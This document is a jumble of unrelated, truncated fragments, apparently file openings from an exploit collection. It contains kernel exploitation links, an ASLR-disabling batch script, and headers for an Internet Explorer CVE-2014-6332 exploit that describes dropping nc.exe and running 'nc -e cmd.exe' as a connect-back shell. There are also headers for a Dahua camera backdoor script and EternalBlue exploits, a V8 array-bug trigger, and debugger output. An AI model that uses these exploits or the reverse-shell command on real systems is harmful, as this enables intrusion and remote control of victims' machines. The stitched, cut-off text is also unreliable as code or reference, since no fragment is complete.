http://phrack.org/issues/64/6.html
https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf
http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/
http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections
http://www.slideshare.net/sciosecurity/linux-kernel-exploitation
http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf
https://github.com/xairy/kaslr-bypass-via-prefetch
http://www.jikos.cz/jikos/Kmalloc_Internals.html
https://github.com/Fuzion24/AndroidKernelExploitationPlayground
http://dcjtech.info/topic/linux-kernel-slab-allocators/
@ECHO OFF
SETLOCAL
ECHO ASLR Enable / Disable Batch Script - Please run as admin
set /p Choice=Want to Enable or Disable ASLR? (e or d):%=%
if "%Choice%"=="e" goto :ENABLE
if "%Choice%"=="d" goto :DISABLE
:ENABLE
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
# Jacked from git history
#
import string
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
<#
================
PATCHEXTRACT.PS1
================
Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis)
This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders.
Organization of the output files is based on the patch's files and will organize them based on their architecture (x86, x64, or wow64)
as well as their content-type, i.e. resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will
with (true) {
// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16.
// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening
function f(){
var x = 8;
var y = 0xffffffff;
var ind = x & y;
x = 16;
y = 0xffffffff;
var ind2 = ind + (x&y);
Click "Start" and "Run."
Type "regedit" without the quotation marks to open the registry editor.
Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft," "Windows NT," "CurrentVersion," and "AeDebug."
Double-click the registry value "Debugger" in the right-hand pane.
Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default.
Click "OK" and close the registry editor.
1:064> !heap -p -a 080b8c30
ReadMemory error for address 00000000
Use `!address 00000000' to check validity of the address.
ReadMemory error for address 0e4c6f3a
Use `!address 0e4c6f3a' to check validity of the address.
ReadMemory error for address 00000000
Use `!address 00000000' to check validity of the address.
ReadMemory error for address 09cf6f3a
Use `!address 09cf6f3a' to check validity of the address.
ReadMemory error for address 06cf6f3a